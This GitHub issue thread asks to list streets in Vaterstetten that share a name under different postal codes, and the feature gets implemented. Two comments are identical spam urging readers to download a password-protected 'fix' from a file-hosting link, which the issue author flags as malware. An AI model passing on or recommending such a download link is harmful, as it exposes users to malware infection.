### ISSUE TITLE
List duplicate street names

### ISSUE THREAD

**Issue by FloEdelmann** [fxedel/vaterstetten-in-zahlen#56]
Previously, [some streets were officially renamed](https://b304.de/strassen-werden-umbenannt-2/) to avoid confusion because there were two streets with the same name and the same ZIP/PLZ code.

But there are probably still streets with the same name and a different ZIP/PLZ code. It would be nice to list them (along with their ZIP/PLZ code) on the [street names page](https://vaterstetten-in-zahlen.de/?tab=strassennamen) to show that confusion might arise from them.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FloEdelmann** [comment]
@fxedel please hide or delete the comment with the spam malware link, I already reported it to GitHub.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fxedel** [comment]
Implemented in [4bf6c6d](https://github.com/fxedel/vaterstetten-in-zahlen/commit/4bf6c6d860cbb9b498fa1a4eba7b0a3630627828)

**Comment by FloEdelmann** [comment]
Really cool!
